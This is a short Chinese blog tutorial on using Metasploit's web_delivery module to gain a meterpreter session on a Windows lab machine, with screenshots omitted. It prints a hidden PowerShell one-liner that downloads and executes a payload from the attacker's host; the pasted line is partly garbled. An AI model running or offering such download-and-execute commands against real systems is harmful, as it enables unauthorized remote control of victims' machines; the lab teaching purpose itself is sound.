metasploit之webdelivery

介绍下webdelivery模块
先是启动metasploit
在这里插入图片描述
接下来选择我们使用的模块
在这里插入图片描述
Show options看看我们需要设置哪些参数

在这里插入图片描述在这里插入图片描述
我们注意到,exploit target出现了python,,莫非还有其他的?我们使用show targets来看看
在这里插入图片描述
2代表的PSH表示的powershell。我们这次的实验针对的是windows的,考虑到不是所有windows用户都会有python,php的环境,所以不如我们选择powershell吧
所以我们set target 2
在这里插入图片描述
再show options看看还需要设置哪些
在这里插入图片描述
我们依次设置好就可以了
在这里插入图片描述
接下来执行攻击
在这里插入图片描述
可以看到我们接收到一串字符串如下:
powershell.exe -nop -w hidden -c M = n e w − o b j e c t n e t . w e b c l i e n t ; M=new-object net.webclient; M=newobjectnet.webclient;M.proxy=[Net.WebRequest]::GetSystemWebProxy();$M.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $M.downloadstring(‘http://192.168.0.104:8080/’);
我们只需要把这串字符串在windows环境下cmd中执行就可以了
在这里插入图片描述
然后回车
这时候回到kali
可以看到
在这里插入图片描述
说明攻击成功了
可以看下会话列表
在这里插入图片描述
注:此处102是我们的靶机,104是我们的攻击机
我们在上图顺便指定了拿到的会话,这就就来到了meterpreter的交互
在这里插入图片描述
拿到meterpreter之后可以做什么呢?我们在metasploit后渗透的课程里已经给大家介绍过了,这里就不再重复了~~
扩展资料:https://www.anquanke.com/post/id/86784(与此模块相关的关于劫持无线鼠标的资料,有兴趣的同学可以看看)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值